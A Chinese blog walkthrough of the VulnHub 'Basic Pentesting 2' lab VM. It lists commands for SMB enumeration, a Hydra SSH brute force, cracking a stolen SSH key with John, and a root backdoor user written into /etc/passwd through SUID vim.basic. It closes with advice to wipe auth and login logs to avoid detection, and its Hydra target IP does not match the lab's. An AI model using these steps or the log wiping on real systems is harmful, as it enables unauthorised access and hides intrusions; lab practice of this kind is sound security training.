侧边栏壁纸
博主头像
douQiuYu343的小破站 博主等级

人最宝贵的东西是生命,生命对于每个人只有一次。人的一生应该是这样度过的:当他回首往事的时候,他不会因为虚度年华而悔恨,也不会因为碌碌无为而羞愧。 这样,在临死的时候,他就能够说:“我的整个生命和全部的精力,都献给世界上最壮丽的事业——为人类的解放而斗争。”

  • 累计撰写 8 篇文章
  • 累计创建 3 个标签
  • 累计收到 0 条评论

目 录CONTENT

文章目录

靶场Basic Pentesting 2实战模拟

douQiuYu343
2026-01-12 / 0 评论 / 0 点赞 / 7 阅读 / 0 字

序言

本章是靶场Basic Pentesting 2实战模拟。当然还是那句话:请各位读者在自建的或者合法的靶场进行操作。如果有知识产权或者本文章错误的地方请在评论区留言或者通过网站博主板块的联系方式告知我,我会及时处理!!!谢谢大家!!!

此处为国家网络安全法律规定——>http://www.npc.gov.cn/zgrdw/npc/xinwen/2016-11/07/content_2001605.htm

一、准备阶段

需要使用kali上的各类工具以及靶场安装,建议虚拟机网口开启桥接模式,因为这次的靶场,在VM中会出现无法使用的情况,必须在VBox虚拟机上才可以正常部署,所以防止两个靶场出现网段不同,只能用桥接。

1.Kali系统

这次主要使用了arp-scan、nmap、msf

2.靶场Basic Pentesting 1部署

下载地址:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

请使用VBox安装靶场,VM安装需要修改网口,太麻烦,不值得

二、攻击

1.信息探测

首先在Kali确定自身IP,然后再搜索同网段下,还有那些主机

ifconfig #看自己kali主机
arp-scan -l #搜索同网段主机
nmap -sV -O xx.xx.xx.xx #搜索攻击服务器的IP的服务

首先知道哪个是我们需要攻击的武器,经过搜索IP和对比特征我们找到了靶场——10.10.1.146

先瞅瞅,SMB的139与445、ajp13的8009以及http的80与8080,这几个点比较可疑

2.开始攻击

(1)SMB初探

进入msf找一下看看有没有我们可以利用的SMB漏洞

msfconsole #进入msf
search Samba #寻找SMB的漏洞库
use auxiliary/admin/smb/samba_symlink_traversal
show options
set RHOSTS 10.10.1.146
set SMBSHARE tmp
exploit

进去一看好像有个admin的,好像是可以的,看看行不行

哎呀不行呢,怎么办啊~不急!我们直接连接看看,能不能进去

smbclient -L 10.10.1.146  
smbclient //10.10.1.146/Anonymous
get staff.txt
cat staff.txt

好像有Anonymous文件夹看看里面有啥好东西

一份公告,写明了不给机密上传到共享文件夹中,但提到了两个人的名字,Jan和Kay,而且Kay是上级,Jan是下级,大概吧!有人会问这有什么啊~,哎说不定在现实中,咱们可以社工呀!

(2)http服务器再探

SMB的信息已经告诉我们,基本上是告诉我们,现在是梅西的表弟——没戏,但是我们看到出来SMB,还有http的,我们网页看看有没有东西可以利用的

80端口访问显示维护中,而8080则啥也不是

不管了,开扫吧,希望有好运气

dirb http://10.10.1.146/

还真有东西,好像是个文件夹,可以被网页访问,来看看有啥

两文件,其中最重要的是j.txt,提到了Jan喜欢用弱密码,咱们可能需要用爆破了看看了,上九头蛇!!!

hydra -L jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.72.217

等了一会儿,有东西了,可能通过SSH登录了

ssh jan@10.10.1.146
whoami
id

进去了,登录密码

可惜不是root用户,想办法提权

(3)提权之路

方法一:

我们寻找文件看看有没有可以利用的文件,寻找期间我们发现了,pass.bak文件看看可不可以打开

cd /home/kay
cat pass.bak

这里有人会有疑惑为什么我会知道Home下面有个Kay,那是因为前面我们看到的邮件信息,都是两个人,Jan和Key,而且Key的等级和技术比较高,有过查询密码的经历,所以我才去查找Home下的Kay用户,当然还是ls jan一点没有

没有权限,那就再找找看还有什么可以利用的,比如密钥

cd .ssh #进入ssh,寻找公私钥文件
ls -la #查看文件权限
cat id_rsa

本地创建文本key,使用ssh2john.py进行破解得到hash值,然后对比密码本找到Kay密码

cd /usr/share/john #进入ssh2john.py所在文件
python ssh2john.py /root/key > ssh_login 
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login

现在登录kay用户看看

chmod 700 key
ssh -i key kay@10.10.1.146

密码输入后进入kay用户,什么id搞一遍看看用户组,但是还是没办法使用root,也不是登录密码sudo,只能看看文件可否查询

ls一看,pass.bak可以被读取,然后提权

ls -la#查看文件权限
cat pass.bak
sudo -l

root有了找flag呗,进入root用户的~目录看看,找到了

方法二:

这个方法比较特殊,是增加用户,这是我最不推荐的方法,因为实际情况下,增加用户,会有风险,但这里我还是写一下,主要是利用了某些工具的提权漏洞

首先查找那些工具具有管理员权限

这里是我看到的一个帖子,说到过Vim的提权漏洞,地址linux 通过suid vim.basic文件提权 - This_is_Y - 博客园

find / -user root -perm -4000 -print 2>/dev/null

我们知道密码基本上都是存储在/etc/passwd中,我们可以利用Vim.basic把用户密码写入

首先生成密码,然后通过Vim.basic打开/etc/passwd文件,并写入用户和生成的密码

openssl passwd -1 –salt asd 123
vim.basic /etc/passwd
dqy:$1$3zt03T8Y$P4fQgzRaaooKGwyagQciO.:0:0:root:/home/dqy:/bin/bas #写入
:wq!

来试试行不行,可以了找到flag了

su dqy #密码123
id #查看用户权限

(4)收尾工作

我这里直接使用别人写好的东西,请删除对应日志里的东西,防止被发现!嘻嘻嘻

文件路径

记录内容

/var/log/auth.log

专注于记录所有与用户认证相关的事件,例如用户的登录尝试、密码更改和使用sudo的记录。这个日志对于监控系统安全和检测未授权访问至关重要。

/var/log/boot.log

记录了系统启动过程中的所有消息。当系统启动失败或服务无法正常加载时,这个日志文件提供了诊断问题的线索。

/var/log/kern.log

专门用于记录来自Linux内核的消息。这些消息可能涉及硬件错误、驱动程序问题或其他与内核相关的事件。

/var/log/dmesg

存储了内核环缓冲区的日志信息。这些信息通常在系统启动时生成,可以通过 dmesg 命令查看,对于理解系统启动过程中的硬件交互非常有用。

/var/log/syslog

是一个传统的通用系统日志文件,它记录了系统启动以来发生的所有重要事件。这个文件通常包含来自系统各个部分的消息,包括应用程序、硬件和内核。

/var/log/messages

/var/log/syslog 类似,是许多现代Linux发行版使用的日志文件。它汇总了系统范围内的消息,包括错误和警告,是进行系统监控和故障排除的重要资源。

/var/log/wtmp

记录了所有用户的登录和注销信息。使用 last 命令可以查看这些信息,这对于审计用户活动和监控系统访问非常有帮助。

/var/log/btmp

记录了失败的登录尝试的详细信息。这个二进制文件需要特定的工具来解析,如 lastb 命令。

/var/log/mail.log

记录了邮件服务器的日志信息,包括邮件的发送和接收。这个日志对于监控邮件服务的运行状态和性能至关重要。

/var/log/faillog

记录了失败的登录尝试,这对于检测潜在的安全威胁和加强系统安全非常有用。

/var/log/lastlog

记录了系统中每个用户的最后一次登录信息,包括登录时间和IP地址。使用 lastlog 命令可以查看这些信息。

/var/log/daemon.log

记录了cron守护进程的日志,包括计划任务的执行情况。这对于确保定时任务按预期执行和监控任务执行结果非常重要。

以下日志需要根据系统是否安装该服务才会存在

/var/log/yum.log

记录了使用yum软件包管理器进行的所有软件包管理操作,包括安装、更新和删除。这个日志文件有助于跟踪软件包的变更历史。

/var/log/httpd/

这个目录包含了Apache HTTP服务器的访问日志和错误日志。通过分析这些日志,可以监控Web服务器的访问模式、性能问题和潜在的安全威胁。

/var/log/nginx/

类似地,/var/log/nginx/ 目录包含了Nginx服务器的日志。这些日志对于监控Nginx服务器的性能和安全性同样重要。

请结合自身清理日志!!!

三、总结

这个阶段主要学习的就是社工手段和分析能力,不在只关注网页、代码等,而是结合人际关系分析服务器使用构成,当然最后我还想再多写点东西,但是想想算了,太累了,提一嘴就行了,再次感谢各位的观看!!!!

0

评论区